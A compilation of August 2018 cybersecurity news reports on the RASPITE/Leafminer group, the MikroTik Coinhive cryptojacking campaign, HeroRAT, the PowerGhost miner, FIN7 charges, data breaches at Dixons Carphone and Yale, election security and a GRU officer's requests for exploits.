In a report on the group last week, Symantec revealed that both custom-built malware and publicly-available tools were leveraged in observed campaigns, including a modified version of Mimikatz. Some of the tools were linked to other groups apparently tied to Iran, Symantec said, noting that the actor appears to be inspired by the Russia-linked Dragonfly group.

“Dragos caught RASPITE early in its maturity which is ideal as it allows us to track its behavior and threat progression to help organizations defend against them. RASPITE uses common techniques which is good because defenders with sufficient monitoring can catch them and mitigate any opportunity for them to get better,” Sergio Caltagirone, Director of Threat Intelligence, Dragos, said.

“At this time we are limiting the amount of information in our public reports to avoid the proliferation of ideas or tradecraft to other activity groups,” Caltagirone continued.

Hundreds of thousands MikroTik Routers involved in massive Coinhive cryptomining campaign
3.8.2018 securityaffairs Cryptocurrency

Experts uncovered a massive cryptojacking campaign that is targeting MikroTik routers to inject a Coinhive cryptocurrency mining script in the web traffic.
Security experts have uncovered a massive cryptojacking campaign that is targeting MikroTik routers, the hackers aim to change the configuration of the devices to inject a Coinhive cryptocurrency mining script in the users’ web traffic.

The campaign was first spotted by the researcher who goes online with the Twitter handle MalwareHunterBR.

another mass exploitation against @mikrotik_com devices (https://github.com/mrmtwoj/0day-mikrotik …)
CoinHive.Anonymous('hsFAjjijTyibpVjCmfJzlfWH3hFqWVT3', #coinhive

1:31 PM - Jul 30, 2018
38 people are talking about this
Twitter Ads info and privacy
According to Catalin Cimpanu from Bleeping Computer, the campaign first started in Brazil, but it is rapidly expanding to other countries targeting MikroTik routers all over the world.

The same campaign was monitored by the experts at Trustwave that confirmed that campaign initially targeted MikroTik routers used by Brazilians.

“On July 31st , just after getting back to the office from my talk at RSA Asia 2018 about how cyber criminals use cryptocurrencies for their malicious activities, I noticed a huge surge of CoinHive in Brazil.” reads the report published by Trustwave.

“After a quick look I saw that this is not your average garden variety website compromise, but that these were all MikroTik network devices.”

The experts noticed that the compromised devices were all using the same CoinHive sitekey, most of them in Brazil, this means that they were targeted by the same attackers.

MikroTik routers compromised

According to Trustwave the hackers were exploiting a zero-day flaw in the MikroTik routers to inject a copy of the Coinhive library in the traffic passing through the MikroTik router.

“Initial investigation indicates that instead of running a malicious executable on the router itself, which is how the exploit was being used when it was first discovered, the attacker used the device’s functionality in order to inject the CoinHive script into every web page that a user visited.” continues the analysis.

The vulnerability was discovered in April and patched by the vendor in just one day.

Technical details for the MikroTik flaw were publicly disclosed in May, public proof-of-concept (PoC) codes for the issue were published on GitHub.
Trustwave pointed out that many users that weren’t using the MikroTik routers were affected too because Internet providers and big organizations leverage MikroTik routers compromised by hackers.

The experts noticed that the threat actors once discovered to have been spotted by the experts switched tactics and injected the Coinhive script only in error pages returned by the routers.

After the initial phase, the campaign was targeting devices outside Brazil, and it has been estimated that roughly 170,000 MikroTik routers were compromised to inject the Coinhive script. The campaign can potentially compromise over a million of MikroTik routers exposed on the Internet.

“The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices,” concludes the experts.

“Even if this attack only works on pages that return errors, we’re still talking about potentially millions of daily pages for the attacker.”

Analyzing the Telegram-based Android remote access trojan HeroRAT
3.8.2018 securityaffairs Android

Researchers at CSE Cybsec ZLab analyzed shared published their analysis of the Telegram-based Android RAT tracked as HeroRAT.
In June, researchers from security firm ESET discovered a new family of Android Remote Administration Tool (RAT), dubbed HeroRAT, that leverages the Telegram BOT API to communicate with the attacker.

The use of Telegram API can be considered a new trend in Android RAT landscape, because other RAT families implementing the same functionalities, such as TeleRAT and IRRAT, were discovered in the wild before HeroRAT.

HeroRAT appeared very active in Iran where it was spreading through third-party app stores, through tainted social media and messaging apps.

ESET experts speculate that the HeroRAT borrows the source code of a malware appeared in the hacking community in March 2018, however, it has some characteristics that distinguish it different from IRRAT and TeleRAT. One of these features is the usage of the Xamarin Framework and TeleSharp Library for the development of the RAT.

HeroRAT is offered for sale on a dedicated Telegram channel, the author offers three different variants depending on its functionalities: bronze (25 USD), silver (50 USD) and gold panels (100 USD). The malware author also released a demo video in which explains the RAT functionalities; below we have a screenshot from this demo video, showing the differences between the three variants.

Figure 1 – Differences between the RAT variants

Further details on the RAT analyzed by CSE Cybsec, including the IoCs and Yara Rules are available in the report published by researchers at ZLAb.

Three members of FIN7 (Carbanak) gang charged with stealing 15 million credit cards
3.8.2018 securityweek  CyberCrime

Three members of the cybercrime group tracked as FIN7 and Carbanak have been indicted and charged with 26 felony counts
Three members of the notorious cybercrime gang known as FIN7 and Carbanak have been indicted and charged with 26 felony counts of conspiracy, wire fraud, computer hacking, access device fraud and aggravated identity theft.

The gang stole over a billion euros from banks across the world, the name “Carbanak” comes with the name of the malware they used to compromise computers at banks and other financial institutions. The three suspects (Dmytro Fedorov, 44, Fedir Hladyr, 33, and Andrii Kopakov, 30) are Ukrainians, they were arrested last year in Europe between January and June.

Fedorov, is a skilled hacker and, who is suspected to be a manager of the group, was arrested at the request of U.S. officials in Bielsko-Biala, Poland, in January and is currently waiting for his extradition to the United States.

In January 2018 foreign authorities also arrested Fedir Hladyr in Dresden, Germany, he is currently detained in Seattle pending trial. Hladyr is suspected to be a system administrator for the group.

In late June 2018, foreign authorities arrested Andrii Kolpakov in Lepe, Spain. The man is suspected to be a supervisor of the group. He is currently detained in Spain pending the United States’ request for extradition.

According to DoJ, the suspects stole more than 15 million credit cards from over 6,500 individual point-of-sale terminals at 3,600 business locations in 47.

“Three high-ranking members of a sophisticated international cybercrime group operating out of Eastern Europe have been arrested and are currently in custody facing charges filed in U.S. District Court in Seattle, announced Assistant Attorney General Brian A.” reads the press release published by the DoJ.

“In the United States alone, FIN7 successfully breached the computer networks of companies in 47 states and the District of Columbia, stealing more than 15 million customer card records from over 6,500 individual point-of-sale terminals at more than 3,600 separate business locations. “


“The three Ukrainian nationals indicted today allegedly were part of a prolific hacking group that targeted American companies and citizens by stealing valuable consumer data, including personal credit card information, that they then sold on the Darknet,” said Assistant Attorney General Benczkowski. “Because hackers are committed to finding new ways to harm the American public and our economy, the Department of Justice remains steadfast in its commitment to working with our law enforcement partners to identify, interdict, and prosecute those responsible for these threats.”
The trio has been accused of targeting hundreds of companies in the United States, and U.S. individuals. The list of victims is long and includes Chipotle Mexican Grill, Jason’s Deli, Sonic Drive-in, and Arby’s.

According to the European authorities, FIN7 developed sophisticated banking trojan tracked as Cobalt, based on the Cobalt Strike penetration testing tool, that was spread through spear-phishing campaigns aimed at employees at different banks.

Once infected the victims’ PC with Carbanak malware, the hackers attempted to identify key people authorized to transfer money from the banks in order to make transactions to fake accounts or ATMs under the control of the gang.

The three men could face many years in prison if convicted.

Alleged Iran-linked APT group RASPITE targets US electric utilities
3.8.2018 securityaffairs APT

According to Dragos firm, the RASPITE cyber-espionage group (aka Leafminer) has been targeting organizations in the United States, Europe, Middle East, and East Asia.
Researchers from security firm Dragos reported that a group operating out of Iran tracked as RASPITE has been targeting entities in the United States, Europe, Middle East, and East Asia, industrial cybersecurity firm Dragos warns.

The group has been active at least since 2017, researchers uncovered operations aimed at government and other types of organizations in the Middle East.

“Dragos has identified a new activity group targeting access operations in the electric utility sector. We call this activity group RASPITE.” read a blog post published by Dragos.

“Analysis of RASPITE tactics, techniques, and procedures (TTPs) indicate the group has been active in some form since early- to mid-2017. RASPITE targeting includes entities in the US, Middle East, Europe, and East Asia. Operations against electric utility organizations appear limited to the US at this time.”

Last week, experts from Symantec who tracked the group as Leafminer published a detailed report on the activity of the cyber espionage team who leveraged both custom-built malware and publicly-available tools in observed campaigns.

According to Symantec, the extent of the campaigns conducted by the group could be wider, the researchers uncovered a list, written in Iran’s Farsi language, of 809 targets whose systems were scanned by the attackers.

The list groups each entry with organization of interest by geography and industry, in includes targets in the United Arab Emirates, Qatar, Bahrain, Egypt, and Afghanistan.

Now researchers from Dragos confirmed that the RASPITE is behind attacks that has been targeting industrial control systems in several states.

According to the experts, the hackers also accessed operations in the electric utility sector in the United States.

The hackers carry on watering hole attacks leveraging compromised websites providing content of interest for the potential victims.

RASPITE attacks appear similar to the ones conducted by other threat actors like DYMALLOY and ALLANITE, the hackers injected in the websites links to a resource to prompt an SMB connection with the intent to gather Windows credentials.

Then, the attackers deploy scripts to install a malware that connects to C&C ad give then attacker the control of the compromised machine.

RASPITE attacks

According to Dragos, even if RASPITE has mainly focused on ICS systems, at the time there is no news about destructive attacks on such kind of devices.

“RASPITE’s activity to date currently focuses on initial access operations within the electric utility sector. Although focused on ICS-operating entities, RASPITE has not demonstrated an ICS-specific capability to date.” continues Dragos.

“This means that the activity group is targeting electric utilities, but there is no current indication the group has the capability of destructive ICS attacks including widespread blackouts like those in Ukraine.”

Sergio Caltagirone, Director of Threat Intelligence, Dragos, explained that his firm provided only limited information on the activity of the group to avoid “proliferation of ideas or tradecraft to other activity groups.”

A mining multitool

2.8.2018 Kaspersky  Cryptocurrency
Symbiosis of PowerShell and EternalBlue for cryptocurrency mining
Recently, an interesting miner implementation appeared on Kaspersky Lab’s radar. The malware, which we dubbed PowerGhost, is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers. This type of hidden consolidation is typical of miners: the more machines that get infected and the longer they remain that way, the greater the attacker’s profits. Therefore, it’s not uncommon to see clean software being infected with a miner; the popularity of the legitimate software serves to promote the malware’s proliferation. The creators of PowerGhost, however, went further and started using fileless techniques to establish the illegal miner within the victim system. It appears the growing popularity and rates of cryptocurrencies have convinced the bad guys of the need to invest in new mining techniques – as our data demonstrates, miners are gradually replacing ransomware Trojans.

Technical description and propagation method
PowerGhost is an obfuscated PowerShell script that contains the core code and the following add-on modules: the actual miner, mimikatz, the libraries msvcp120.dll and msvcr120.dll required for the miner’s operation, a module for reflective PE injection and a shellcode for the EternalBlue exploit.

Fragment of the obfuscated script

The add-on modules encoded in base64

The malicious program uses lots of fileless techniques to remain inconspicuous to the user and undetected by antivirus technologies. The victim machine is infected remotely using exploits or remote administration tools (Windows Management Instrumentation). During infection, a one-line PowerShell script is run that downloads the miner’s body and immediately launches it without writing it to the hard drive.

What the script does after that can be broken down into several stages:

Automatic self-update. PowerGhost checks if a new version is available on the C&C. If there is, it downloads the new version and launches it instead of itself.

Propagation.With the help of mimikatz, the miner obtains the user account credentials from the current machine, uses them to log on and attempts to propagate across the local network by launching a copy of itself via WMI. By “a copy of itself” here and below we mean the one-line script that downloads the miner’s body from the C&C.
PowerGhost also tries to spread across the local network using the now-notorious EternalBlue exploit (MS17-010, CVE-2017-0144).
Escalation of privileges. As the miner spreads via mimikatz and WMI, it may end up on a new machine with user rights. It will then attempt to escalate its privileges in the system with the 32- or 64-bit exploits for MS16-032, MS15-051 and CVE-2018-8120.
Establishing a foothold in the system. PowerGhost saves all the modules as properties of a WMI class. The miner’s body is saved in the form of a one-line PowerShell script in a WMI subscription that activates every 90 minutes.

Payload.Lastly, the script launches the miner by loading a PE file via reflective PE injection.
In one PowerGhost version, we detected a tool for conducting DDoS attacks. The malware writers obviously decided to make some extra money by offering DDoS services.

PowerShell function with the tell-tale name RunDDOS

It’s worth pointing out that this is the only one of the miner’s functions that copies files to the hard drive. This is quite possibly a test tool that will later be replaced with a fileless implementation. Also supporting the assertion that this function was added to this version as an afterthought is the peculiar way the DDoS module is launched: the script downloads two PE modules, logos.png and cohernece.txt. The former is saved to the hard drive as java-log-9527.log and is an executable file for conducting DDoS attacks. The file cohernece.txt is protected with the software protection tool Themida, complete with a check for execution in a virtual environment. If the check does not detect a sandbox, then cohernece.txt launches the file java-log-9527.log for execution. In this curious way, the ready DDoS module was supplemented with a function to check for execution in a virtual environment.

Fragment of disassembled code of the file cohernece.txt

Statistics and geography
Corporate users bore the brunt of the attack: it’s easier for PowerGhost to spread within a company’s local area network.

Geography of infections by the miner

PowerGhost is encountered most often in India, Brazil, Columbia and Turkey.

Kaspersky Lab’s products detect the miner and/or its components with the following verdicts:

E-wallets at nanopool.org and minexmr.com:


Indicators of compromise
C&C hostnames:

Darknet Market Spokesman Gets Nearly 4 Years in Prison
2.8.2018 securityweek Crime

ATLANTA (AP) — A man who promoted an international criminal online marketplace and assisted people using it for illicit transactions was sentenced Tuesday in Atlanta to serve nearly four years in federal prison.

Ronald L. Wheeler III of Streamwood, Illinois, worked for about two years as a public relations specialist for AlphaBay, which authorities have said was the world's leading "darknet" marketplace when an international law enforcement effort shut it down in July 2017.

Wheeler pleaded guilty in March to a charge of conspiracy to commit access device fraud. Prosecutors said he worked with others to steal personal information — including passwords, email addresses and bank account numbers — to obtain money, goods and services.

U.S. District Judge Leigh May sentenced Wheeler, 25, to spend three years and 10 months in prison, followed by three years of supervised release. As part of a plea deal reached with prosecutors, Wheeler also agreed to forfeit $27,562 in cash found in his home and 13.97 bitcoins, which are currently worth a total of more than $100,000.

Wheeler apologized to the judge and told her he has worked hard since he was caught to get himself on the right path — getting a legitimate job, paying taxes and kicking a drug addiction.

"As I move forward, I hope to be able to do right by this country and the world," he said.

May said Wheeler's crime was extremely serious, but she imposed the relatively light sentence agreed to by the two sides in part because of the effort he'd made.

"You're doing what you need to do to show me you've learned from this," she said.

Known online as Trappy and Trappy_Pandora, Wheeler began working for AlphaBay in May 2015. His duties included moderating the AlphaBay forum on Reddit and posting information about AlphaBay in other Reddit forums, mediating sales disputes among the marketplace's users, providing nontechnical assistance to users and promoting AlphaBay online, prosecutors have said.

Wheeler's lawyer, Phillip Turner, described his client as a "very misguided young man who came from a situation where he lacked self-esteem and got on the wrong path." Having a title bestowed upon him by AlphaBay made him feel important and gave him a sense of belonging, Turner said in court.

Prosecutor Samir Kaushal told the judge Wheeler was completely aware he was involved in illegal activity and encouraged lawlessness in others. Given the scope of the illegal activity enabled by AlphaBay — including the sale of personal financial information and dangerous drugs — Wheeler could have been charged with much more serious crimes that would have carried a much heftier sentence.

"This is a very good outcome for him," Kaushal said.

The only reason prosecutors recommended a lower sentence is because when he was caught, he immediately admitted his guilt and began cooperating with the government, Kaushal said.

Wheeler was paid a salary in bitcoin, a digital currency, by Alexandre Cazes, the 25-year-old Canadian owner of AlphaBay who was known online as Alpha02 and Admin, according to a court filing.

AlphaBay used Tor, a network of thousands of computers run by volunteers, to hide its tracks. With Tor, traffic gets relayed through multiple computers, with identifying information stripped at each stop so no single computer knows the full chain.

The court filing says Wheeler's work with AlphaBay ended July 3, 2017. Two days later, Cazes was arrested in Thailand with DEA and FBI assistance, resulting in AlphaBay going offline. Cazes died in Thai police custody on July 12, 2017. The country's narcotics police chief told reporters at the time that Cazes hanged himself in jail just before a scheduled court hearing.

The police agency Europol estimates AlphaBay had done $1 billion in business since its 2014 creation. Cazes had amassed a $23 million fortune as the site's creator and administrator, according to court records.

Dixons Carphone Breach: Much Larger Than First Thought
2.8.2018 securityweek Incindent

A data breach at Dixons Carphone that was made public last month resulted in 10 million records being accessed by unknown actors, the consumer UK electronics retailer announced Tuesday.

The company initially said that only 1.2 million records containing personal data of its customers, such as name, address or email address, were accessed during the intrusion. They also claimed that the accessed data did not include financial information.

In an update released this week (PDF), the company revealed that hackers were able to access approximately 10 million records containing personal data. The incident happened last year, but no specific details on when or how the intrusion took place were provided.

Although it initially said that the attackers were attempting to access 5.9 million cards and that 105,000 non-EU issued payment cards were indeed compromised, the company now says that the impacted records did not contain payment card details.

“While there is now evidence that some of this data may have left our systems, these records do not contain payment card or bank account details and there is no evidence that any fraud has resulted. We are continuing to keep the relevant authorities updated,” Dixons Carphone said.

The company also announced that it has decided to inform all of its customers of the data breach. The retailer claims that this is only a precaution and that it only apologizes to customers, while advising them of available protective steps they could take to minimize the risk of fraud.

“As we indicated previously, we have taken action to close off this access and have no evidence it is continuing,” the company said.

Yale University Discloses Decade-Old Data Breach
2.8.2018 securityweek Incindent

"Because the intrusion happened nearly ten years ago, we do not have much more information about how it occurred."

Yale University revealed that hackers accessed one of its databases between 2008 and 2009 and accessed the personal information of 119,000 people.

The intrusion happened between April 2008 and January 2009 and apparently affected a single database stored on a Yale server. The data breach was discovered on June 16, 2018, during a security review. The attackers extracted names, Social Security numbers, and, in almost all cases, dates of birth. In many cases, Yale email addresses were also extracted, and in some cases the physical addresses of individuals associated with the university were compromised as well.

According to Yale, no financial information was stored in the database and almost all people impacted by the breach were affiliated with the university.

“In 2011, Yale IT deleted the personal information in the database as part of an effort to eliminate unneeded personal information on Yale servers, but the intrusion was not detected at that time,” the university says.

Last week, Yale sent notices of the data breach to impacted members of the Yale community, including alumni/ae, faculty members, and staff members. The university says notices were sent to nearly 97% of the individuals affected, but that it has yet to acquire a verified current address for the remaining 3%.

In a letter (PDF) to the State of New Hampshire Attorney General, Yale also revealed that the same server was hacked a second time between March 2016 and June 2018. The intrusion resulted in the compromise of the names and Social Security numbers of 33 individuals, none of whom reside in New Hampshire.

Yale claims that there is no indication that the compromised information has been misused. However, it decided to offer identity monitoring services at no cost, to help users guard against identity theft.

Because the intrusion occurred a decade ago, there is no information on how the attackers hacked the server. Yale also says that “it is not feasible to determine the identities of the perpetrators.”

Trump Criticized for Not Leading Effort to Secure Elections
2.8.2018 securityweek BigBrothers

WASHINGTON (AP) — As alarms blare about Russian interference in U.S. elections, the Trump administration is facing criticism that it has no clear national strategy to protect the country during the upcoming midterms and beyond.

Both Republicans and Democrats have criticized the administration's response as fragmented, without enough coordination across federal agencies. And with the midterms just three months away, critics are calling on President Donald Trump to take a stronger stand on an issue critical to American democracy.

"There's clearly not enough leadership from the top. This is a moment to move," said Maryland Sen. Chris Van Hollen, head of the Democratic Senatorial Campaign Committee. "I don't think they are doing nearly enough."

Various government agencies have been at work to ensure safe voting. The FBI has set up a Foreign Influence Task Force and intelligence agencies are collecting information on Russian aggression.

But Trump himself rarely talks about the issue. And in the nearly two years since Russians were found to have hacked into U.S. election systems and manipulated social media to influence public opinion, the White House has held two meetings on election security.

One was last week. It ran 30 minutes.

The meeting resulted in no new presidential directive to coordinate the federal effort to secure the election, said Suzanne Spaulding, former undersecretary of homeland security who was responsible for cyber security and protecting critical infrastructure.

"Trump's failure to take a leadership role on this, up until this (National Security Council) meeting, misses an opportunity to send a clear message to states that this is a very serious threat," Spaulding said. "We did not get out of this NSC meeting a comprehensive, interagency strategy. It was each department and agency working in their silos."

Garrett Marquis, a spokesman for the NSC, said the government response is robust. He said NSC staff "leads the regular and continuous coordination of the whole-of-government approach to addressing foreign malign influence and ensuring election security."

At a cybersecurity summit on Tuesday, Vice President Mike Pence said he was confident officials could prevent further meddling by foreign agents.

"We will repel any efforts to interfere in our elections," he said.

Republican Sen. Lindsey Graham of South Carolina said government agencies are "doing a lot of good work, but nobody knows about it." He lamented Trump's contradictory statements about whether he accepts the U.S. intelligence assessment that Russia meddled in the 2016 presidential election.

"What I think he needs to do is lead this nation to make sure the 2018 election is protected," Graham said recently on CBS' "Face the Nation." ''He needs to be the leader of the movement — not brought to the dance reluctantly. So, I hope he will direct his government, working with Congress, to harden the 2018 election before it's too late."

The debate over safeguarding U.S. elections comes as evidence of cyber threats piles up. Facebook announced Tuesday that it has uncovered "sophisticated" efforts, possibly linked to Russia, to influence U.S. politics on its platforms.

The company said it removed 32 accounts from Facebook and Instagram because they were involved in "coordinated" political behavior and appeared to be fake. Nearly 300,000 people followed at least one of the accounts.

Earlier this month, Microsoft said it discovered that a fake domain had been set up as the landing page for phishing attacks by a hacking group believed to have links to Russian intelligence. A Microsoft spokesman said Monday that additional analysis has confirmed that the attempted attacks occurred in late 2017 and targeted multiple accounts associated with the offices of two legislators running for re-election. Microsoft did not name the lawmakers.

Sen. Claire McCaskill, D-Mo., has said Russian hackers tried unsuccessfully to infiltrate her Senate computer network in 2017.

Sen. Jeanne Shaheen, D-N.H., who is not running for re-election, told The Associated Press on Monday that someone contacted her office "claiming to be an official from a country."

A frequent critic of Russia, Shaheen said she didn't know if Moscow was behind the email received in November but had turned the matter over to the FBI.

Shaheen said another senator had been targeted besides McCaskill. "It's my understanding that there is, but I don't want to speak for other senators," she said. When asked if it was a Democratic senator, Shaheen nodded yes.

"People on both sides of the aisle have been beating the drum for two years now about the need for somebody to be accountable for cybersecurity across the government," Shaheen said.

National Intelligence Director Dan Coats said U.S. intelligence officials continue to see activity from individuals affiliated with the Internet Research Agency, whose members were indicted by U.S. special counsel Robert Mueller. Coats said they create new social media accounts disguised as those of Americans, then use the fake accounts to drive attention to divisive issues in America.

In the Obama administration, synchronizing federal agencies' work on election security would have likely been the job of the White House cybersecurity coordinator. Trump's national security adviser, John Bolton, abolished the post in May to remove a layer of bureaucracy from the NSC flow chart.

Under the current structure, the point man for election security is Rear Adm. Douglas Fears. Trump tapped Fears in early June as his deputy assistant to the president and homeland security and counterterrorism adviser.

Fears oversees the election security and other portfolios of the NSC's Cybersecurity Directorate and coordinates the federal government's response to disasters.

Homeland Security Secretary Kirstjen Nielsen says cyber threats are "an urgent, evolving crisis."

"Our adversaries' capabilities online are outpacing our stove-piped defenses," Nielsen said Tuesday. "In fact, I believe that cyber threats collectively now exceed the danger of physical attacks against us. This is a major sea change for my department and for our country's security."

FireEye MalwareGuard Uses Machine Learning to Detect Malware
2.8.2018 securityweek

FireEye on Tuesday announced the launch of MalwareGuard, an engine that leverages machine learning (ML) to detect malware and prevent it from executing.

MalwareGuard has been added to FireEye’s Endpoint Security product and the firm will also be deploying the new engine to its Network Security and Email Security solutions.

The engine is designed to predict whether a Windows executable file is malicious, prior to its execution. MalwareGuard should be able to detect both known malware and zero-day threats, FireEye said.

MalwareGuard is based on two years of research conducted by the company, which included assembling a dataset of more than 300 million samples and using it to train the engine. During its internal evaluation, which involved testing in real-world incident response cases, FireEye made predictions on over 20 million executable files.

“During the internal evaluation period, we also developed the infrastructure to support long-term tracking and maintenance for MalwareGuard,” FireEye said in a blog post. “Our goal was and is to have real-time visibility into the model’s performance, with the expectation that model retraining could be done on demand when performance dips below a threshold. To meet this objective, we developed data pipelines for each phase of the ML process, which makes the system fully automatable.”

The company’s blog post includes details on the goals, development, and testing of MalwareGuard.

In addition to MalwareGuard, FireEye informed customers that its Endpoint Security solution now includes new features designed to provide improved management capabilities and enable organizations to rapidly respond to important alerts.

MalwareGuard and the other new features have been added to the latest version of FireEye Endpoint Security, specifically version 4.5.

Leaked Chats Show Alleged Russian Spy Seeking Hacking Tools
2.8.2018 securityweek BigBrothers

MOSCOW (AP) — Six years ago, a Russian-speaking cybersecurity researcher received an unsolicited email from Kate S. Milton.

Milton claimed to work for the Moscow-based anti-virus firm Kaspersky. In an exchange that began in halting English and quickly switched to Russian, Milton said she was impressed by the researcher's work on exploits — the digital lock picks used by hackers to break into vulnerable systems — and wanted to be copied in on any new ones that the researcher came across.

"You almost always have all the top-end exploits," Milton said, after complimenting the researcher about a post to her website, where she often dissected malicious software.

"So that our contact isn't one-sided, I'd offer you my help analyzing malicious viruses, and as I get new samples I'll share," Milton continued. "What do you think?"

The researcher — who works as a security engineer and runs the malware-sharing site on the side — always had a pretty good idea that Milton wasn't who she said she was. Last month, she got confirmation via an FBI indictment.

The indictment, made public on July 13, lifted the lid on the Russian hacking operation that targeted the 2016 U.S. presidential election. It identified "Kate S. Milton" as an alias for military intelligence officer Ivan Yermakov, one of 12 Russian spies accused of breaking into the Democratic National Committee and publishing its emails in an attempt to influence the 2016 election.

The researcher, who gave her exchanges with Milton to The Associated Press on condition of anonymity, said she wasn't pleased to learn she had been corresponding with an alleged Russian spy. But she wasn't particularly surprised either.

"This area of research is a magnet for suspicious people," she said.

The researcher and Milton engaged in a handful of conversations between April 2011 and March 2012. But even their sparse exchanges, along with a few digital breadcrumbs left behind by Yermakov and his colleagues, offer insight into the men behind the keyboards at Russia's Main Intelligence Directorate, or GRU.

It isn't unusual for messages like Milton's to come in out of the blue, especially in the relatively small world of independent malware analysts.

"There was nothing particularly unusual in her approach," the researcher said. "I had very similar interactions with amateur and professional researchers from different countries."

The pair corresponded for a while. Milton shared a piece of malicious code at one point and sent over a hacking-related YouTube video at another, but contact fizzled out after a few months.

Then, the following year, Milton got back in touch.

"It's been all work, work, work," Milton said by way of apology, before quickly getting to the point. She needed new lock picks.

"I know that you can help," she wrote. "I'm working on a new project and I really need contacts that can provide information or have contacts with people who have new exploits. I am willing to pay for them."

In particular, Milton said she wanted information on a recently disclosed vulnerability codenamed CVE-2012-0002 - a critical Microsoft flaw that could allow hackers to remotely compromise some Windows computers. Milton had heard that someone had already cobbled together a working exploit.

"I'd like to get it," she said.

The researcher demurred. The trade in exploits — for use by spies, cops, surveillance companies or criminals — can be a seedy one.

"I usually steer clear from any wannabe buyers and sellers," she told the AP.

She politely declined - and never heard from Milton again.

Milton's Twitter account — whose profile photo features "Lost" star Evangeline Lilly — is long dormant. The last few messages carry urgent, awkwardly worded appeals for exploits or tips about vulnerabilities.

"Help me find detailed description CVE-2011-0978," one message reads, referring to a bug in PHP, a coding language often used for websites. "Need a work exploit," the message continues, ending with a smiley face.

It isn't clear whether Yermakov was working for the GRU when he first masqueraded as Kate S. Milton. Milton's Twitter silence — starting in 2011 — and the reference to a "new project" in 2012 might hint at a new job.

In any case, Yermakov wasn't working for the anti-virus firm Kaspersky — not then and not ever, the company said in a statement.

"We don't know why he allegedly presented himself as an employee," the statement said.

Messages sent by the AP to Kate S. Milton's Gmail account were not returned.

The exchanges between Milton (Yermakov) and the researcher could be read in different ways.

They might show that the GRU was trying to cultivate people in the information security community with an eye toward getting the latest exploits as soon as possible, said Cosimo Mortola, a threat intelligence analyst at the cybersecurity company FireEye.

It's also possible that Yermakov might have initially worked as an independent hacker, hustling for spy tools before being hired by Russian military intelligence — a theory that makes sense to defense and foreign policy analyst Pavel Felgenhauer.

"For cyber, you have to hire boys that understand computers and everything the old spies at the GRU don't understand," Felgenhauer said. "You find a good hacker, you recruit him and give him some training and a rank — a lieutenant or something — and then he will do the same stuff."

The leak of Milton's conversations shows how the glare of publicity is revealing elements of the hackers' methods — and perhaps even hints about their private lives.

It's possible, for example, that Yermakov and many of his colleagues commute to work through the arched entrance to Komsomolsky 22, a military base in the heart of Moscow that serves as home to the alleged hacker's Unit 26165. Photos shot from inside show it's a well-kept facility, with a czarist-era facade, manicured lawns, flower beds and shady trees in a central courtyard.

The AP and others have tried to trace the men's digital lives, finding references to some of those indicted by the FBI in academic papers on computing and mathematics, on Russian cybersecurity conference attendee lists or — in the case of Cpt. Nikolay Kozachek, nicknamed "kazak" — written into the malicious code created by Fancy Bear, the nickname long applied to the hacking squad before their identities were allegedly revealed by the FBI.

One of Kozachek's other nicknames also appears on a website that allowed users to mine tokens for new weapons to use in the first-person shooter videogame "Counter Strike: Global Offensive" — providing a flavor of the hackers' extracurricular interests.

The AP has also uncovered several social media profiles tied to another of Yermakov's indicted colleagues — Lt. Aleksey Lukashev, allegedly the man behind the successful phishing of the email account belonging to Hillary Clinton's campaign chairman, John Podesta.

Lukashev operated a Twitter account under the alias "Den Katenberg," according to an analysis of the indictment as well as data supplied by the cybersecurity firm Secureworks and Twitter's "Find My Friends" feature.

A tipster using the Russian facial recognition search engine FindFace recently pointed the AP to a VKontatke account that, while using a different name, appears active and features photos of the same young, Slavic-looking man.

Many of his posts and his friends appear to originate from a district outside Moscow known as Voskresensky. The photos show him cross-country skiing at night, wading in emerald waters somewhere warm and visiting Yaroslavl, an ancient city northwest of Moscow. One video appeared to show Russia's 2017 Spasskaya Tower Festival, a military music festival popular with officers.

The AP could not establish with certainty that the man on the VKontatke account is Lukashev. Several people listed as friends either declined to comment when approached by the AP or said Lukashev's name was unknown to them.

Shortly thereafter, the profile's owner locked down his account, making his vacation snaps invisible to outsiders.

The exchanges between the cybersecurity researcher and Kate S. Milton are available here.

The Disconnect Between Understanding Email Threats and Preventing Them
2.8.2018 securityweek

Email continues to be the starting point for the majority of all security breaches. The 2018 Verizon Data Breaches Investigation Report (DBIR) says that email is the attack vector in 96% of breaches. But a new study suggests that despite these figures, companies are not allocating sufficient resources to reduce email risk.

The study (PDF) was conducted the Ponemon Institute for Valimail, an email security automation firm. Ponemon surveyed 650 IT and IT security professionals who have a role in securing email applications and/or protecting end-users from email threats. It found, according to Ponemon, a "disconnect between concerns about email threats and fraud and the lack of action taken by companies represented in this study."

Findings suggest that 80% of respondents are very concerned about their ability to counter the email threat, but only 29% are taking significant steps to counter the threat. The greatest concerns are that hackers might spoof their email domain "to hurt the deliverability of legitimate emails" (82%); the overall state of their current email security (80%); and that they could be hacked or infiltrated via a phishing email (69%).

The threat from email phishing, spoofing and impersonation attacks is understood and acknowledged. Seventy-four percent of respondents are concerned about phishing emails directed at employees or executives; 67% about email as a source of fraud against the company (such as BEC attacks); 66% about email as a vector for infiltrating malware and/or exfiltrating data; and 65% about hackers impersonating the company in phishing attacks against others -- that is, other firms and non-employees.

The disconnect comes from the company response to the concerns held by their own professionals. Only 29% of the respondents believe their firm is taking significant steps to prevent phishing attacks and email impersonation, while 21% say they are taking 'no steps' -- despite the DBIR's evidence that email is the source of almost all data breaches.

Only 41% of the respondents say their organization has created a security infrastructure or plan for email -- but of these, almost half say there is no schedule for reviewing its effectiveness (39%), or are unsure of any review schedule (10%). Only 11% of respondents said their organization reviews the effectiveness of its email security plan quarterly.

Part of the problem may be down to the traditional relationship between OT and IT. While email is firmly a part of information technology rather than operational technology, nevertheless it has an operational business function. As such, operational ease and continuity might be receiving a higher priority than security. This is possibly supported by managerial responsibility.

Asked, 'Who within the organization is primarily responsible for the security of email and services/applications that use email?', only 15% of the respondents said it was the CISO/CSO. Twenty-one percent said it was the CIO/CTO, 20% said the line of business management, 9% said the head of messaging services, and 9% said the head of IT Operations. Somewhat surprisingly, the majority of organizations do not have their head of security responsible for the security of emails.

